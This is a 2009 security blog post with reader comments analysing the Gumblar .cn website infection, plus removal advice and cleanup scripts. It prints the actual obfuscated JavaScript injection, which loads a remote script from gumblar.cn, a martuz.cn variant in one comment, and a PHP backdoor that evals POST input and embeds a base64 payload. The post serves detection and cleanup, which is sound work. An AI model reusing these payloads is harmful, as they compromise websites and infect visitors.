msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Gumblar .cn Exploit – 12 Facts About This Injected Script

   07 May 09   Filed in Website exploits

I’ve been watching this exploit for about a week now.  During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

2 Every infected site has it’s own modification of the script. However every modification has common parts and can be easily identified as the gumblar .cn script.

  1. The script starts with “(function(
  2. The function has no name.  It is anonymous and self-invoking.
  3. The script is obfuscated. I.e. some characters are replaced with  their numeric codes, and then the “%” character replaced with some orbitrary character. Here are some sample excerpts of the encrypted data: “…20a.3d.22Sc.72iptEngin.65…“, “…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…“, “…v_61_72_20_61_3d_22_53_63rip_74E_6e…
  4. Near the end of the script there is a “.replace(” function
  5. If the function accepts parameters, at the very end you’ll find a simple regular expression like /”/g or /~/g, etc. that will decrypt the mangled “%” character.

3 When the script is executed (every time someone visits the infected web page),  another script from “gumblar . cn/rss/” is silently loaded and executed.

4 This code is usually injected right before the <body> tag.  I saw a web page with eight(!) <body> tags (yeah, invalid HTML) and the gumblar scripts were injected before each of them.

5 Sometimes I encounter this script on sites infected with the malicious iframes that I reviewed in my recent posts. So this exploit may use the same infection technique. And probably the same clean up steps may be applied.

6 Unlike the recent iframe exploits, where the malicious code was only injected into files with most common filenames (e.g. index.html, index.php, etc.) this gumblar script is injected into every web page.

7 This script is also injected into .js (JavaScript) files. Usually at the very bottom.

8 Maybe it’s just a coincidence but about 95% of the infected sites used PHP. It is not possible to say for sure if the rest sites used PHP. Who knows.

9 This exploit doesn’t use some particular script vulnerability. I encountered it on phpBB, SMF and vBulletin forums, on WordPress 2.7.1 blogs, on proprietary PHP sites.

10 Some people reported that the following code is injected into PHP files:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64 _decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBFb0xTPSd2YXI8MjBhPDNkPDIyUzw2M3I8NjlwdDw0NW5naTw2ZWU8MjI8MmNiPDNkPDIyVmVyczw2OW88NmUoKSs8MjI8MmNqPDNkPDIyPDIyPDJjPDc1PDNkPDZlYXZpZ2F0b3I8MmV1czw2NTw3MkFnZW50PDNiaWYoKHU8MmVpPDZlPDY0ZXhPZig8MjJXaW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyODwyMjw0ZVQ8MjA2PDIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZldDwyZWNvbzw2YmllPDJlaTw2ZWRleDw0ZmYoPDIyPDZkaTw2NTw2YjwzZDE8MjIpPDNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3Nno8NzRzKTwyMTwzZHR5cGU8NmZmKDwyMjw0MTwyMikpPDI5PDdiPDdhcnZ6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc8NjluZG93PDJlPDIyK2ErPDIyKTw2YTwzZDw2YSs8MjI8MmJhKzwyMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjIrYis8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8MjIpPDNiZG9jPDc1bWVudDwyZXdyaTw3NGU8Mjg8MjI8M2NzPDYzcjw2OXB0PDIwczw3MmM8M2Q8MmY8MmZndTw2ZDw2Mmw8NjFyPDJlY248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjPDVjPDJmPDczY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6PUVvTFMucmVwbGFjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDaXopKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v) if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,)20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>

The base64-encoded part is this gumblar .cn script.

This PHP code, it’s structure and variable names (tmp_lkojfghx, tmp_lkojfghx3, TMP_XHGFJOKL) are the same as in the infamous fake Yahoo counter exploit. Only the injected javascript is different. Maybe it was created by the same people, or maybe just the same exploitation kit was used.

11 This is not a server-wide exploit. I checked several servers with infected sites. Most of the neighbor sites were clean.

12 Gumblar .cn domain is currently blacklisted by Google.

Removal

Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.

Then (from a clean computer) change FTP passwords.

Try not to store them inside programs that you use to upload files to a server.

Whenever possible use secure connections. I.e. use SFTP instead of plain FTP. Many shared hosting plans include SFTP.

Finally, remove the malicious code from all server files (.html, .php, .js, etc.). The easiest way to do it, is replace them with clean files from a backup.

If you have more facts about this exploit, please post them in the comment section below.

May 10, 2009. Update…

Round Up of the Comments

The comments section of this blog post contains a lot of additional useful facts from webmasters of infected sites.  Be sure to read them.

Zork noticed that his site’s .htaccess file was modified

Jason talks about what this exploit does from a visitors point of view. Of course a visitor can be a webmaster of another site.

adel sarlak mentioned that this exploit also adds image.php files into image directories. It can also change directory permissions.

James also elaborates on the scripts in image.php and some other .php
files. He suggest a shell command to find infected files.

C Filorux shared information about a POST-and-eval backdoor script found on an infected site.

rad-one posted a PHP script that scans all files from your site looking for the exploit signatures.
It looks incomplete and you might need to finish it before using.

Another removal instructions from Neil Williams.

Great comment from web host LarryL who deliberately infected a PC to find out how this virus works. With this information, he suggests re-infection preventing strategy.

Thanks for sharing this info. If anyone wants to publish an article about how they fought the infection or the impact of the infection, please contact me – I can publish it here as a guest post. I’m also looking for “hardening a website” tips and tricks.

P.S. I suggest that you use Unmask Parasites to check if you site is infected. It’s safe and fast.

Similar posts:

Reader's Comments (194)

  1. |

    [...] http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/co… [...]

  2. |

    [...] Here is some excellent reading on JSRedir-R and how it all get’s started: http://www.theregister.co.uk/2009/05/15/script_menace/ [...]

  3. |

    Here is the process I used to clean gumblar.cn off of our site, and it appears to have worked. (still waiting to see if it comes back)

    I used the “Replace in Files” feature of Visual Studio 2008, which saved me from manually removing malicious code from more than 350 files. If you don’t have Visual Studio 2008, there may be other text-editors with Find/Replace features that will work, but I haven’t tried anything else.

    DISCLAIMER: I tried to make the searches specific enough that they will only find the bad gumblar code and remove it, but there is always the chance that these searches will find and replace legitimate code. USE AT YOUR OWN RISK, or if you are concerned you may want to step through each match one by one to ensure that it is actually a match. At the very least, back up the files first, just in case.

    STEPS:

    1) If possible, turn off FTP and Web Services

    2) In Visual Studio, use Ctrl-Shift-F to open the Find in Files dialog.

    3) Enter the path to your web site root in the “Look in” box. Uncheck the ‘Match whole word’ box. Check the ‘Use’ box and select ‘Wildcards’.

    4) In the ‘Look at these filetypes’ box, enter: *.php; *.js, *.html

    5) Perform the following searches. This is a good chance to review the results before switch to to ‘Replace in Files’ mode and doing a ‘Replace All’.

    SEARCH #1:<script language=javascript><!–*\n*\n*<body>
    REPLACE WITH: <body>
    Run this search several times, until no results are found (some files may have multiple occurances, and it only removes them one at a time).

    SEARCH #2: <?php if(!function_exists(’tmp_lkojfghx’)*tmp_lkojfghx2(); ?>
    REPLACE WITH: nothing

    SEARCH #3: <?php eval(base64_decode(*c7′)); ?>
    REPLACE WITh: nothing

    SEARCH #4: <!–*\n*(function(*.replace(*\n*–>
    REPLACE WITH: nothing

    6) Once the searches are done, find any folders called ‘images’. They should each have an ‘images.php’ file, which should now be empty. Change permissions on these files so that no user can alter or modify them.

    7) Change the passwords on any accounts used to access the server by FTP. It may also be a good idea to change other admin account passwords, just to be safe.

    8) Turn FTP and Web services back on, and then periodically use the searches above to see if the infection returns.

    These steps worked for me, but may not work as well in other cases. I hope they can be of use to some of you, though. :) Good luck, and take care!

    -Kevin

  4. |

    Ok, the restrictions on posting code on this site are really frustrating. (It removed most of my search strings).

    I put the instructions up on a blog so everyone can see. I hope I can post a simple URL here. :p

    http://kevinharvie.wordpress.com/

    -Kevin

  5. |

    Removal tool:
    I manage a dedicated server and have been infected in over 200 domains. I created a script that scans all files on the server and if it finds an infection (gumblar line code) it’s removed and file is cleaned.

    Read comments lines to run the script first to clean .php files and then other .js .html .htm files.
    ______________________________________________

    <?php
    function encontrar_extension ($fichero) {
    $fichero = strtolower($fichero) ;
    $extension = split(“[/\\.]“, $fichero) ;
    $n = count($extension)-1;
    $extension = $extension[$n];
    return $extension;
    }

    function listar_directorios_ruta($ruta){
    // abrir un directorio y listarlo recursivo

    if (is_dir($ruta)) {
    if ($dh = opendir($ruta)) {
    while (($file = readdir($dh)) !== false) {
    //echo “Nombre de archivo: $file : Es un: ” . filetype($ruta . $file);
    if (is_dir($ruta . $file) && $file!=”.” && $file!=”..”){
    listar_directorios_ruta($ruta . $file . “/”);
    }
    else{

    $ext=encontrar_extension($file);
    //if( $ext==”js” || $ext==”html” || $ext==”htm”){ To clean files .js,.html,.htm uncomment this line and comment line below
    if($ext==”php”){
    $save=false;
    $cont = file($ruta.$file);
    foreach($cont as $id => $art) {
    // $palabra=’gumblar’; To clean files .js,.html,.htm uncomment this line and comment line below
    $palabra=’tmp_lkojfghx’;
    if(eregi($palabra,$art) && eregi(‘eval’,$art)){ //If content $palabra and ‘eval’,file is infected
    echo “\nInfeccion en $ruta$file–>linea $id:”.$art. “\n”;

    //unset($cont[$id]);//To clean files .js,.html,.htm uncomment this line and comment line below
    $cont[$id]=”<?php\n”;
    $save=true;
    }
    }
    $cont_new = implode(”, $cont);
    if($save){
    $f = fopen($ruta.$file, ‘w’);
    fwrite($f, $cont_new);
    fclose($f);
    }
    }

    }
    }
    closedir($dh);
    }
    }else
    echo “Error”;
    }

    $dir=”/var/www/”;
    listar_directorios_ruta($dir);
    ?>

    • |

      In this line :
      // $palabra=’gumblar’; To clean files .js,.html,.htm uncomment this line and comment line below
      Change gumblar to gumbla. There are code lines that contain 20a.3d.22Sc.12gumbla20a.3d.22Sc. and others 20a.3d.22Sc.12gumblar20a.3d.22Sc. So finding ‘gumbla’ my script localize this 2 lines.

      • |

        You should not could on this. Every site has it’s own copy of the script where they encode random characters.

        E.g. ~2f~67umblar~2ecn or “2f”2fgumbl“61r”2ec
        (these sample are from real sites)

  6. |

    [...] の代わり ——- EMERGENCY ——– If you’re looking for “martuz.cn” info, just watch here Gumblar .cn Exploit – 12 Facts About This Injected Script gumblar.cn and martuz.cn same IP ADDRESS. Unfortunatery, you’ll have yielded same behavior for [...]

  7. |

    I’m infected on three client sites and one is currently blocked by Goog.

    Can someone tell me how to write permissions for a new image.php file or point me to a resource? Thanks in advance.

    Also check to see if you have any additional adobe plugins for your browsers. I suspect this could be an issue, but I don’t have verifiable data.

  8. |

    Hello,
    I have taken those broken script ideas a little further, and developed a small application that will check all your files and folders, and will destroy the malicious GUMBLAR code in your affected files.

    The program will list all potentially infected files, and will try to clean
    them. If successful, a “CLEANED” notification will be displayed.

    Download the zip file from our site, http://www.axxis.gr
    Go to the ‘Customer Login’ page
    ( http://www.axxis.gr/index.php?option=com_customersupport )

    We suggest you run this program periodically, to be sure your files are
    healthy! ;)

    • |

      Attention!

      I didn’t test the script. It may modify your files and in case of bugs you may lose sensitive data. If you decide to give this script a try, make sure you have a backup of all your server files.

      Use it at your own risk.

      • |

        The script will NOT make you lose any data, as it targets SPECIFICALLY GUMBLAR CODE! And when it finds “gifimg.php” or “image.php”, it simply empties them.

        The html file injection gets completely cleaned.

        The php file injection is rendered harmless, by
        1. changing condition execution to “if (1!=1)” so it never gets executed
        2. deleting completely this line:
        “if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2′)$GLOBALS['tmp_xhgfjokl']=$a;”
        3. deleting function call “tmp_lkojfghx2();”

        I have not been able to target JS code, as my js files did not get infected.

        The distinctive characteristic of gumblar is its ability of morphing, so this script may need additional checks in the future. You are all welcome to send your “version” of gumblar code, and I will try to fix this too.

        • |

          Erasing the contents of files named “image.php” can be very hazardous to some CMS systems, including WordPress.

        • |

          When i ran this file on my webserver, i get the following php error

          Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/miketr2/public_html/file_checker.php on line 108

          • |

            I’ve taken into consideration your comment Shawn, and now the image.php files are being emptied only when gumblar code is found in them.

  9. |

    If you are running a vBulletin site, you are FAR better off to copy over the distribution files with a clean set. At a minimum, you should run the “Suspect Files” utility in the admincp maintenance utility. It will at least tell you which files are not “original” and give you some idea of the scope of your problem. Frankly, I would not take any chances, bite the bullet and replace what there with a clean set of files. The key problem to solve is the one on your local PC. If you don’t find and fix the trojan, you can expect that it will reinfect your site no matter what you do there.

    For vBulletin users, I will add some more info as I get it here, http://www.vbplusme.com/showthread.php?t=528. This exploit was reported but not identified as Gumblar.cn a couple of weeks ago.

  10. |

    Nice post.

    And a very good comment from Kevin.

    But I think restoring from a clean backup would be more safe and easier for most of the sites.

    For dynamically updated sites, we should not restore folders that get updated via user interaction, but take pain to clean them up.

  11. |

    A commenter on my site just posted a whole rash of code she found in one of the image.php files. Looking at it closel, it looks like this is the infection script:

    http://www.techknowme.com/blog/2009/05/fighting-the-jsredir-r-gumblarcn-trojan/comment-page-1/#comment-2

  12. |

    Bunches of ASP and ASPx files on our website were also infected.

    • |

      Are you sure they are infected with “Gumblar”? There are many other exploits.

      • |

        “Gumblar” will hit any htm, html, asp, aspx or php file that has a body tag in it and append itself to the bottom of any js file. On one clients site it also attempted to overwrite the htaccess file (permissions forbade it).

  13. |

    [...] http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ [...]

  14. |

    [...] There have been some useful scripts posted in the comments about this virus at blog.unmaskparasites.com. [...]

  15. |

    how can I remove it from my rss feed?

  16. |

    [...] is some coverage about it: http://blog.scansafe.com/ http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ [...]

  17. |

    [...] infects a web server, I’d love to hear it. Between the information I’ve gleaned over at Unmask Parasites and in the comments of the last post, I think a lot of folks have been helped out, and I’d [...]

  18. |

    Not sure if it will help, but one of our customers websites was completely riddled with this. During my research – and in the process finding this site :-) – I noticed that the ftp logs show that all the affected files on the site were downloaded, then immediately uploaded (slightly larger file size) from i.p. 74.52.26.66 between May 18 18:38:39 and May 18 18:39:32 (358 transfers total).

    • |

      One of our clients computers was infected with the client-side portion of the virus. It’s a trojan that monitors all FTP traffic, sending the auth details back to the payload server (gumblar.cn).

      A short period after the infected CLIENT uses FTP (from an hour to 6 hours), another IP address (a server with a very fast connection) will connect via FTP and iterate through a number of files downloading, infecting, then reuploading them almost immediately. In this way, several hundred files across multiple folders can be infected in less than a minute.

      Removing the web-based portion of the infection is ONLY a stop-gap. You MUST remove the infection from the users computer that is causing the FTP auth details to be sent to gumblar or you’re just going to create a vicious cycle of removing infections.

    • |

      Hi Jules,
      I noticed similar behavior from a .my IP 174.37.54.19.

      Apart from downloading every file on the site, and uploading select verions with a slightly larger size (but not for EVERY file), I also noticed the client run some odd commands:
      Sat May 16 22:12:15 2009
      OK CHMOD: Client “174.37.54.19″, “/htdocs/tinymce/jscripts/tiny_mce 0755″
      OK DELETE: Client “174.37.54.19″, “/htdocs/tinymce/jscripts/tiny_mce/tiny_mce_src.js”
      OK UPLOAD: Client “174.37.54.19″, “/htdocs/tinymce/jscripts/tiny_mce/tiny_mce_src.js”, 209682 bytes, 38.79Kbyte/sec

      Strange behaviour for an automated dropper-worm that one would presume is running on infected shell accounts…

      • |

        Oops, sorry – the .my comment was from another issue I’m investigating – this IP from the Gumblar dropper was via a Dallas site! :)

  19. |

    Argh! This has hit 5 websites ive been working on lately..

    this is what was embedded on them (after unescape)
    ——————————————
    if(!myia){document.write(unescape( ”));}var myia=true;
    ——————————————

    Nightmare!!

    • |

      If this is what was embedded and nothing else, this line of code is harmless…

      are you sure this is it? because it doesn’t seem like the gumblar virus…

      • |

        It’s had some of the code removed due to the posting restrictions on this site. That code is a trimmed down version of the “cookie check” method for the Gulmblar virus. It tries to ensure that it only infects each user a single time through each domain, so it’s not easy to trace where the infection came from. The first time it infects the computer, it loads a customized URL from Gumblar.cn then sets a cookie (based on the specific site and variant of the infection), that identifies whether the user has had the script injected for them. If it has been, the user won’t see it ON THAT SITE again. At least not from the same variant. If their site is re-infected again later, a new variant with a new cookie will be loaded.

  20. |

    We were infected by this and managed to eventually get rid of it.

    Initially we just tried getting rid of the bad code but every time we did it just re appeared again.

    We finally got rid of it by deleting everything off our server and re installing phpbb3 with a back up of the forum. The forum is our mainsite so that was the priority, but we lost our TV streaming site, we decided it was best as it used RSS feeds which seems the top suspect in how they were getting in, the only other way was them somehow getting our FTP or server password which seemed unlikely as nothing else was affected.

    You can follow our progress and how we found and finally dealt with it at the thread on the link below, all the best to everyone fighting and looking into this pest.

    http://www.havenvideo.com/viewtopic.php?f=2&t=35832

  21. |

    I found a gifimg.php file within all directories named “images”. Took me forever to clean everything up.

  22. |

    This actually started to become an aggressive script injection since Conficker was released. Its imperative that a PC is clean prior to changing any ftp or cpanel passwords. If the pc is not scanned or cleaned up any changes to the password are moot since the infection somehow manages to steal login information.

    I remove these injections on a daily basis and have a script that can do it with relative ease.

  23. |

    [...] hope that know one else’s website has been hit with the gumblar-cn-exploit parasite. I have, and it has not been any fun getting rid of it. Actually, at one point, I thought [...]

  24. |

    Like I’ve posted in several comments above – removing the infection within the files on your server is going to be only a small part of the actual removal.

    The virus that has infected someone with FTP access to those sites is what is ultimately responsible for compromising the sites. The user should have issues opening a command prompt and regedit, and may have issues downloading updates to security software (like Malware Bytes, AVG and others). They should also have issues patching Adobe Reader & Acrobat and any other Adobe products.

    The actual infection uses a malformed PDF file to drop an infection into the Windows folder. On the client computer I recently cleaned it was named “qvs.ste” and was located at:
    c:\windows\qvs.ste

    However, the file is in use and cannot be removed directly. Further, it tags itself in the startup so it will automatically load as a driver, here:
    [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]

    Something interesting was that the path to the file within the registry value includes “\..\”, which should make it really easy to find (it was the only instance of that string on the infected computer, though some HP AIO drivers include similar tags throughout the registry on other machines). The following registry file would remove it:

    =========================
    REGEDIT4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
    -”aux2″=”C:\\WINDOWS\\system32\\..\\qvs.ste”
    =========================

    I personally used LogMeIn to access the computer and then used Killbox (http://www.killbox.net/) to remove it (use “replace on reboot” and make sure “end explorer” is selected) to remove the actual infection.

    Good luck to everyone who is still dealing with this darn thing.

  25. |

    Howdy…
    I had this nasty guy on my site. I downloaded my entire site to a separate hard drive, then ran avast through the files. I found the infected code (posted below) and removed from each file from my C Panel, changed all PW’s. This was a tough ball to break indeed!
    Good luck!

  26. |

    I have found the following code inserted to all html and htm files on my website. All code injections happen between the section of each file

    Google is reporting that the website is hosting malware, and that it links back to martuz.cn

    Would i be safe if i run that Gumblar removal script posted above? I dont want to do it if im going to loose any data..

    thanks

    Richie

    • |

      Arg, it removed the code.. moderator, please post this

      (function(){var VCYSq=’var@20a@3d@22Scrip@74En@67in@65@22@2c@62@3d@22Version(@29+@22@2cj@3d@22@22@2cu@3dnavig@61tor@2e@75s@65rA@67@65@6e@74@3b@69f@28(u@2e@69@6edexOf@28@22Chrome@22)@3c0)@26@26(u@2einde@78O@66@28@22W@69n@22@29@3e@30@29@26@26(u@2eindexO@66(@22NT@20@36@22)@3c0)@26@26(@64o@63ument@2ec@6fokie@2eindexOf(@22miek@3d1@22)@3c@30)@26@26(@74@79p@65of@28zrv@7ats)@21@3dty@70@65@6ff(@22A@22)))@7bzr@76zts@3d@22@41@22@3bev@61l(@22if(win@64o@77@2e@22+a+@22)j@3dj+@22+a@2b@22@4dajo@72@22+@62@2ba@2b@22Minor@22+b@2b@61@2b@22@42uild@22+b@2b@22j@3b@22)@3b@64@6f@63u@6den@74@2ewri@74e(@22@3cscript@20s@72c@3d@2f@2fma@22+@22@72tu@7a@2e@63n@2fv@69d@2f@3fid@3d@22+j+@22@3e@3c@5c@2fscr@69pt@3e@22)@3b@7d’;var tKmp=VCYSq.replace(/@/g,’%');var c85=unescape(tKmp);eval(c85)})();

      There were comments right before the function call and after the ;

      • |

        The removal script I posted will not do anything on your virus code. And what you posted probably is not the actual code, as there are posting restrictions on this block.

        put your code in a txt file, zip it, and store it somewhere in the internet.

        Post the zip file’s URL here or send it to me (info@axxis.gr) to check it and include in the removal script.

  27. |

    I created a script yesterday for automatically removing the trojan from a website, and posted it on my blog. (Since I disinfected my site last night, it may still be reported as an attack site, but I requested a review by Google, so that should be done tomorrow – ignore the warning.)
    http://www.danielansari.com/wordpress/2009/05/automatic-removal-of-gumblarmartuz-trojan/

    • |

      Thanks, this worked great for cleaning my websites.

      For my infected PC, I used both Malwarebytes and ComboFix. Changed my passwords, updated Adobe Flash Player and updated Adobe Reader to 9.1, disabled Adobe JavaScript and changed my FTP passwords. Hopefully, I covered everything and it won’t come back.

      Is there anything else I should do? I only run AVG firewall, do I need something else/better?

  28. |

    I see all kinds of suggestions, most seem to be really time-consuming, but what I did took me less than an hour.

    I ran Malwarebyte’s Antimalware on my PC, cleaned the virus, reset my passwords, updated Acrobat reader.

    Then I went on my site, ran my removal script.

    It’s been 4 days now, and this thing didn’t come back.

  29. |

    this information is really very useful
    in last month i remove virus from minimum 25 sites

  30. |

    Here’s my vaccine against the Gumblar worm. Hope this helps.
    http://zzz.rezo.net/Security-beware-of-the-Gumblar.html

  31. |

    I was run Malwarebyte’s Antimalware on my PC, clean the virus then Cleaned the web page and Change website passwords then send review request to google , after 6 hours google remove a malware notification from my index webpage from search engine .
    but
    yesterday i received a email from google that your subdomain is infected .

    my question :
    where is going to my pc this malware ?
    rapidly my pc is infected

  32. |

    [...] Gumblar trojan : Gumblar explode across the Web Beware of the Gumblar Worm PHP exploit on the loose 12 Facts about the Gumblar Exploit Removal and Prevention of [...]

  33. |

    [...] but these modifications have common parts that can be identified as the gumblar . cn script. Read this post for more information on Gumblar symptoms. You may also want to check your website using this [...]

  34. |

    [...] http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ [...]

  35. |

    [...] own site saved on your computer, then those logins and passwords may have been compromised. The virus we suspect to be the culprit steals these passwords, logs into your FTP account, and then proceeds to alter or upload files. It [...]

  36. |

    [...] This blog post give some facts on the exploit which I used to help with the removal. [...]

  37. |

    We ended up buying a tool called HyperXR. It was not cheap or free bt fixed our problem on the server files. php files which get run on server with files with bad code.

  38. |

    Google has finally weighed in:
    http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html

  39. |

    Why don’t you just replace the “eval” with “alert” and have a look at the de-obfuscated code? worked perfectly for me (NoScript is my friend^^)

  40. |

    [...] See this for more information: Gumblar .cn Exploit – 12 Facts About This Injected Script | Unmask Parasites. Blog. [...]

  41. |

    [...] list. Their figures counted 60,000 sites infected with its payload which according to this account injects malicious Javascript code into every HTML file it can find. Meanwhile, Goooogleadsence.biz [...]

  42. |

    [...] organismes de surveillance ont reporté de vastes failles pointant vers les domaines gumblar.cn et martuz.cn, qui se sont tous deux [...]

  43. |

    I think I found the source of the virus,
    thanks to ZoneAlarm.

    delete these files:

    C:\WINDOWS\system32\wbem\proquota.exe
    C:\WINDOWS\system32\wbem\grpconv.exe

    I hope this help us, I spent several months fighting with this damn virus

  44. |

    [...] Gumblar .cn Exploit – 12 Facts About This Injected Script [...]

  45. |

    [...] Gumblar .cn Exploit – 12 Facts About This Injected Script [...]

  46. |

    [...] Is There A New Virus Threat? Here’s some information on Gumblar: Gumblar .cn Exploit – 12 Facts About This Injected Script | Unmask Parasites. Blog. Gumblar Exploit ScanSafe STAT Blog – ScanSafe STAT Blog – GumblarQ&A It could also be the [...]

  47. |

    [...] Windows Server 2003 References ScanSafe: http://blog.scansafe.com/ Unmask Parasites Blog: http://blog.unmaskparasites.com/2009…jected-script/ Switched: http://www.switched.com/2009/06/18/h…or-web-threat/ Beladen: a server-level exploit. [...]

  48. |

    [...] … </SCRIPT> con el código malicioso de todos tus archivos .htm, .php, .asp, etc. Aquí hay indicaciones de como identificarlo en concreto (en inglés), aunque cualquier Webmaster con [...]

  49. |

    I first downloaded the public_html folder of my site, and then scanned the folder using AVG. AVG gave me the location of all of the infected files.

    I then used my Cpanel (on a Linux server) file editor to take out the malicious code to avoid opening any files within my own windows machine.

    I also noticed that the virus seems to go for main pages such as the any index.php files as well as main.php plus the config.php file in all sites.

  50. |

    [...] as potentially dangerous. R Web Security › Add New Post — WordPress Other malware researchers reported widespread compromises pointing to the domains gumblar.cn and martuz.cn, both of which made it on [...]